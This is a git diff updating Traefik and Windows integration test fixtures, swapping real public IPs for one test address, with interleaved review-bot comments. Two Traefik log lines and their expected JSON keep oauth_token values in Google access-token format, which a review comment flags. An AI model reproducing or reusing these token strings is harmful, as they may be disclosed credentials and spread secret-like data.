@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release traefik package for v8.0.0 diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log index a271309d214..9fb557e3ff3 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log 
@@ -1,7 +1,7 @@
 192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] "GET /ui/favicons/favicon-16x16.png HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 262 "Host-host-1" "http://172.19.0.3:5601" 2ms
-85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms
-70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms
+89.160.20.156 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms
+89.160.20.156 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms
 ::1 - - [29/Nov/2018:15:03:51 +0000] "GET / HTTP/1.1" 404 19 "-" "curl/7.62.0" 10 "backend not found" "/" 0ms
-94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms
-89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] "GET 
/marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms
+89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms
+89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] "GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms
 127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326
diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json
index 92d59b259c3..17b84dc7482 100644
--- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json
+++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json
@@ -46,7 +46,7 @@
 },
 "event": {
 "duration": 2000000,
- "ingested": "2021-06-08T12:48:40.206985600Z",
+ "ingested": "2021-12-09T13:49:15.037421500Z",
 "original": "192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] \"GET /ui/favicons/favicon-16x16.png HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 262 \"Host-host-1\" \"http://172.19.0.3:5601\" 2ms",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
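Review bot: The two rewritten request lines (`+89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/...` and the `/marketplace/tax?...` line that follows) still carry `oauth_token=ya29.…` query values in the Google access-token format, so the IP sanitization leaves the most sensitive-looking part of the fixture untouched. Since these lines are being edited anyway, replace the token values with an obviously synthetic string such as `oauth_token=REDACTED_TEST_TOKEN` and regenerate the matching `url.original`/`event.original` values in test-format-common.log-expected.json. Realistic-format tokens in committed fixtures trip secret scanners on every clone and fork and, if they were ever live, have to be treated as disclosed regardless of age. A smaller point: all four distinct public source IPs collapse to 89.160.20.156, so the expected file now asserts the same geo/AS block five times; if some variety is wanted, the supported test range presumably offers more than one address — worth confirming.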
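Review bot: The only change in this hunk is the `event.ingested` timestamp, a value the pipeline stamps at run time, and the same churn recurs in the `@@ -137`, `@@ -227`, `@@ -302`, `@@ -389`, `@@ -478` and `@@ -548` hunks of this file, in test-format-json.log-expected.json and throughout the windows forwarded expected files. elastic-package lets a pipeline test declare such fields as dynamic in the data stream's test config (`test-<name>-config.yml`) with the two lines `dynamic_fields:` and `  event.ingested: ".*"`, after which regenerating the expected files no longer rewrites every timestamp. Doing that in this PR would leave only the geo/AS/IP deltas in the diff, which is what actually needs reviewing here.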
@@ -85,24 +85,24 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "DE-BE",
- "city_name": "Berlin",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Land Berlin",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 13.4531,
- "lat": 52.4473
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 6805,
+ "number": 29518,
 "organization": {
- "name": "Telefonica Germany"
+ "name": "Bredband2 AB"
 }
 },
- "address": "85.181.35.98",
- "ip": "85.181.35.98"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "url": {
 "original": "/ui/favicons/favicon.ico"
@@ -119,7 +119,7 @@
 },
 "related": {
 "ip": [
- "85.181.35.98"
+ "89.160.20.156"
 ]
 },
 "http": {
@@ -137,8 +137,8 @@
 },
 "event": {
 "duration": 3000000,
- "ingested": "2021-06-08T12:48:40.207010400Z",
- "original": "85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms",
+ "ingested": "2021-12-09T13:49:15.037430300Z",
+ "original": "89.160.20.156 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "category": [
@@ -175,25 +175,25 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "CA-ON",
- "city_name": "Ottawa",
- "country_iso_code": "CA",
- "country_name": "Canada",
- "region_name": "Ontario",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -75.7518,
- "lat": 45.2691
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 577,
+ "number": 29518,
 "organization": {
- "name": "Bell Canada"
+ "name": "Bredband2 AB"
 }
 },
- "address": "70.29.80.15",
- "ip": "70.29.80.15"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "url": {
 "original": "/en/"
@@ -210,7 +210,7 @@
 },
 "related": {
 "ip": [
- "70.29.80.15"
+ "89.160.20.156"
 ]
 },
 "http": {
@@ -227,8 +227,8 @@
 },
 "event": {
 "duration": 247000000,
- "ingested": "2021-06-08T12:48:40.207017Z",
- "original": "70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms",
+ "ingested": "2021-12-09T13:49:15.037436300Z",
+ "original": "89.160.20.156 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "category": [
@@ -302,7 +302,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-08T12:48:40.207023400Z",
+ "ingested": "2021-12-09T13:49:15.037442100Z",
 "original": "::1 - - [29/Nov/2018:15:03:51 +0000] \"GET / HTTP/1.1\" 404 19 \"-\" \"curl/7.62.0\" 10 \"backend not found\" \"/\" 0ms",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -338,24 +338,24 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "PL-14",
- "city_name": "Warsaw",
- "country_iso_code": "PL",
- "country_name": "Poland",
- "region_name": "Mazovia",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 21.0,
- "lat": 52.25
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 39603,
+ "number": 29518,
 "organization": {
- "name": "Play"
+ "name": "Bredband2 AB"
 }
 },
- "address": "94.254.131.115",
- "ip": "94.254.131.115"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "url": {
 "original": "/assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo"
@@ -372,7 +372,7 @@
 },
 "related": {
 "ip": [
- "94.254.131.115"
+ "89.160.20.156"
 ]
 },
 "http": {
@@ -389,8 +389,8 @@
 },
 "event": {
 "duration": 13000000,
- "ingested": "2021-06-08T12:48:40.207028400Z",
- "original": "94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms",
+ "ingested": "2021-12-09T13:49:15.037447900Z",
+ "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "category": [
@@ -427,24 +427,24 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "PL-22",
- "city_name": "Gdańsk",
- "country_iso_code": "PL",
- "country_name": "Poland",
- "region_name": "Pomerania",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 18.649,
- "lat": 54.3605
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 6830,
+ "number": 29518,
 "organization": {
- "name": "Liberty Global B.V."
+ "name": "Bredband2 AB"
 }
 },
- "address": "89.64.35.193",
- "ip": "89.64.35.193"
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "url": {
 "original": "/marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM"
@@ -461,7 +461,7 @@
 },
 "related": {
 "ip": [
- "89.64.35.193"
+ "89.160.20.156"
 ]
 },
 "http": {
@@ -478,8 +478,8 @@
 },
 "event": {
 "duration": 8000000,
- "ingested": "2021-06-08T12:48:40.207033100Z",
- "original": "89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms",
+ "ingested": "2021-12-09T13:49:15.037453700Z",
+ "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "category": [
@@ -548,7 +548,7 @@
 }
 },
 "event": {
- "ingested": "2021-06-08T12:48:40.207037600Z",
+ "ingested": "2021-12-09T13:49:15.037459400Z",
 "original": "127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] \"GET /apache_pb.gif HTTP/1.0\" 200 2326",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json
index 06c35230cdf..3a1ce846417 100644
--- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json
+++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json
@@ -46,7 +46,7 @@
 },
 "event": {
 "duration": 40356,
- "ingested": "2021-06-08T12:48:40.515007700Z",
+ "ingested": "2021-12-09T13:49:16.108367600Z",
 "original": "{\"BackendAddr\":\"\",\"BackendName\":\"Traefik\",\"BackendURL\":{\"Scheme\":\"\",\"Opaque\":\"\",\"User\":null,\"Host\":\"\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"127.0.0.1:48658\",\"ClientHost\":\"127.0.0.1\",\"ClientPort\":\"48658\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":19,\"DownstreamStatus\":404,\"DownstreamStatusLine\":\"404 Not Found\",\"Duration\":40356,\"FrontendName\":\"backend not found\",\"OriginContentSize\":19,\"OriginDuration\":4086,\"OriginStatus\":404,\"OriginStatusLine\":\"404 Not Found\",\"Overhead\":36270,\"RequestAddr\":\"backend.elastic-package-service.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":7,\"RequestHost\":\"backend.elastic-package-service.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T18:56:54.735539596Z\",\"StartUTC\":\"2021-03-16T18:56:54.735539596Z\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_X-Content-Type-Options\":\"nosniff\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_X-Content-Type-Options\":\"nosniff\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.67.0\",\"time\":\"2021-03-16T18:56:54Z\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -123,7 +123,7 @@
 },
 "event": {
 "duration": 3034764,
- "ingested": "2021-06-08T12:48:40.515028400Z",
+ "ingested": "2021-12-09T13:49:16.108372900Z",
 "original": "{\"BackendAddr\":\"172.21.0.2:80\",\"BackendName\":\"backend-backend-docker\",\"BackendURL\":{\"Scheme\":\"http\",\"Opaque\":\"\",\"User\":null,\"Host\":\"172.21.0.2:80\",\"Path\":\"\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"172.21.0.1:59068\",\"ClientHost\":\"172.21.0.1\",\"ClientPort\":\"59068\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":383,\"DownstreamStatus\":200,\"DownstreamStatusLine\":\"200 OK\",\"Duration\":3034764,\"FrontendName\":\"Host-backend-docker-docker-localhost-2\",\"OriginContentSize\":383,\"OriginDuration\":2155389,\"OriginStatus\":200,\"OriginStatusLine\":\"200 OK\",\"Overhead\":879375,\"RequestAddr\":\"backend.docker.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":27,\"RequestHost\":\"backend.docker.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T19:08:41.039598834Z\",\"StartUTC\":\"2021-03-16T19:08:41.039598834Z\",\"downstream_Content-Length\":\"383\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Length\":\"383\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.64.1\",\"time\":\"2021-03-16T19:08:41Z\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/traefik/manifest.yml b/packages/traefik/manifest.yml
index e116f28d380..b9529913088 100644
--- a/packages/traefik/manifest.yml
+++ b/packages/traefik/manifest.yml
@@ -1,6 +1,6 @@
 name: traefik
 title: Traefik
-version: 1.2.0
+version: 1.2.1
 release: ga
 description: Collect logs and metrics from Traefik servers with Elastic Agent.
 type: integration
diff --git a/packages/windows/changelog.yml b/packages/windows/changelog.yml
index e7cb53565c9..60cd1ce321d 100644
--- a/packages/windows/changelog.yml
+++ b/packages/windows/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.5.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.5.0"
 changes:
 - description: Support Kibana 8.0
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json
index ba60ee22974..1f6958b7011 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-powershell-events.json-expected.json
@@ -37,7 +37,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:36.674249100Z", + "ingested": "2021-12-09T13:49:18.310984200Z", "code": "4105", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4105\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e102\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T09:04:04.755232500Z'/\u003e\u003cEventRecordID\u003e790\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{dd68516a-2930-0000-5962-68dd3029d601}'/\u003e\u003cExecution ProcessID='4204' ThreadID='1476'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003ef4a378ab-b74f-41a7-a5ef-6dd55562fdb9\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e9c031e5c-8d5a-4b91-a12e-b3624970b623\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", 
@@ -148,7 +148,7 @@ }, "event": { "sequence": 34, - "ingested": "2021-06-14T13:22:36.674267700Z", + "ingested": "2021-12-09T13:49:18.310994Z", "code": "4103", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.897949500Z'/\u003e\u003cEventRecordID\u003e3885\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0002-c208-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='3984' ThreadID='3616'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = ed57761b-ba0f-4d11-87d9-fac33820d20e\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.17763.1007\n Runspace ID = 0729459a-8646-4176-8b02-024421a9632e\n Pipeline ID = 1\n Command Name = cmd.exe\n Command Type = Application\n Script Name =\n Command Path = C:\\Windows\\system32\\cmd.exe\n Sequence Number = 34\n User = VAGRANT\\vagrant\n Connected User = VAGRANT\\vagrant\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(cmd.exe): \"cmd.exe\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"symbolic link created for C:\\vagrant 
\u0026lt;\u0026lt;===\u0026gt;\u0026gt; \\\\vboxsvr\\vagrant\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:13:06.703293900Z'/\u003e\u003cEventRecordID\u003e3917\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0003-db0b-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='5032' ThreadID='4160'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.17763.1007\n Host ID = aae5217d-054f-435f-9968-4b5bebf12116\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n Engine Version = 5.1.17763.1007\n Runspace ID = a87e8389-57c7-4997-95ff-f82f644965bf\n Pipeline ID = 9\n Command Name = Resolve-Path\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 22\n User = VAGRANT\\vagrant\n Connected User =\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"WarningAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): 
name=\"InformationAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"Verbose\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Debug\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Gopath\\src\\github.com\\elastic\\beats\\x*\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -199,7 +199,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:36.674277300Z", + "ingested": "2021-12-09T13:49:18.311000300Z", "code": "4106", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4106\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e103\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T10:40:32.595715200Z'/\u003e\u003cEventRecordID\u003e933\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{e3200b8a-290e-0002-332a-20e30e29d601}'/\u003e\u003cExecution ProcessID='4776' ThreadID='5092'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003e4c487c13-46f7-4485-925b-34855c7e873c\u003c/Data\u003e\u003cData 